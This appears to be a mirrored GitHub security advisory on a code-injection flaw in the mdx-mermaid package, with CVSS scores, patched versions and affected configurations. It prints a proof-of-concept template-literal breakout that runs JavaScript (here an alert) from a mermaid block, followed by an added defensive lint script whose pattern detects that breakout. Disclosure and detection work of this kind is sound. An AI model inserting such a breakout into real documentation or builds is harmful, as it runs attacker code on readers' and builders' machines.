GitHub Advisory Database: GHSA-RVGM-35JW-Q628
Aug 31, 2022 - 10:26 p.m.

Improper Control of Generation of Code ('Code Injection') in mdx-mermaid

2022-08-31 22:26:11
CWE-94
GitHub Advisory Database
github.com
code injection
mdx-mermaid
arbitrary javascript
security risk
patches
workarounds
software

CVSS3: 7.8

Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS: 0.001
Percentile: 17.8%

Impact

Arbitrary JavaScript injection.

If any mermaid code block is modified to include the following code, the code inside executes when the component is loaded by MDXjs:

```
` + (function () {
  // Put Javascript code here
  return ''
}()) + `
```

The block below shows a valid mermaid code block:

```mermaid
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```

The same block, but with the exploit added:

```mermaid
` + (function () {
  alert('vulnerable')
  return ''
}()) + `
graph TD;
    A-->B;
    A-->C;
    B-->D;
    C-->D;
```
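A pre-build check for the pattern shown above, as an added example that is not part of the advisory or of mdx-mermaid's code. It assumes the chart text ends up inside a backtick-delimited template literal in generated JavaScript (inferred from the shape of the payload); the function name `findSuspiciousMermaidBlocks` and the sample input are constructed for illustration.

```javascript
// Added example: pre-build lint for MDX sources. Not mdx-mermaid's own code.
// Assumption: chart text is embedded in a backtick-delimited template literal
// in generated JavaScript, so a backtick or "${" in the block can leave the string.
const FENCE = '`'.repeat(3); // built at runtime so this file carries no literal fence
const FENCE_OPEN = new RegExp('^\\s*' + FENCE + 'mermaid\\s*$');
const FENCE_CLOSE = new RegExp('^\\s*' + FENCE + '\\s*$');
const BREAKOUT = /`|\$\{/; // ends the literal, or starts an interpolation

// Returns one finding per offending line inside a mermaid block.
function findSuspiciousMermaidBlocks(mdxSource) {
  const findings = [];
  let blockStart = 0; // 1-based line of the opening fence, 0 when outside a block
  mdxSource.split(/\r?\n/).forEach((line, i) => {
    if (blockStart === 0) {
      if (FENCE_OPEN.test(line)) blockStart = i + 1;
    } else if (FENCE_CLOSE.test(line)) {
      blockStart = 0;
    } else if (BREAKOUT.test(line)) {
      findings.push({ blockStart, line: i + 1, text: line.trim() });
    }
  });
  return findings;
}

// Constructed sample: the advisory's two blocks as they would sit in an .mdx file.
const SAMPLE_MDX = [
  '# Docs page',
  FENCE + 'mermaid',
  'graph TD;',
  '    A-->B;',
  FENCE,
  '',
  FENCE + 'mermaid',
  '` + (function () {',
  "  alert('vulnerable')",
  "  return ''",
  '}()) + `',
  'graph TD;',
  '    A-->B;',
  FENCE,
].join('\n');

for (const f of findSuspiciousMermaidBlocks(SAMPLE_MDX)) {
  console.log(`block at line ${f.blockStart}: line ${f.line}: ${f.text}`);
}
```

A finding is a prompt to review the block, not proof of malicious content; the fix remains upgrading to one of the patched versions listed under Patches.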

Patches

1.3.0 and 2.0.0-rc2

Workarounds

None known

Affected configurations

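Vulners

Node

| Vendor | Product | Condition | Version | Target software |
| --- | --- | --- | --- | --- |
| mdx-mermaid_project | mdx-mermaid | Match | 2.0.0-rc1 | node.js |
| OR | | | | |
| mdx-mermaid_project | mdx-mermaid | Range | <1.3.0 | node.js |

| Vendor | Product | Version | CPE |
| --- | --- | --- | --- |
| mdx-mermaid_project | mdx-mermaid | 2.0.0-rc1 | cpe:2.3:a:mdx-mermaid_project:mdx-mermaid:2.0.0-rc1:*:*:*:*:node.js:*:* |
| mdx-mermaid_project | mdx-mermaid | * | cpe:2.3:a:mdx-mermaid_project:mdx-mermaid:*:*:*:*:*:node.js:*:* |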
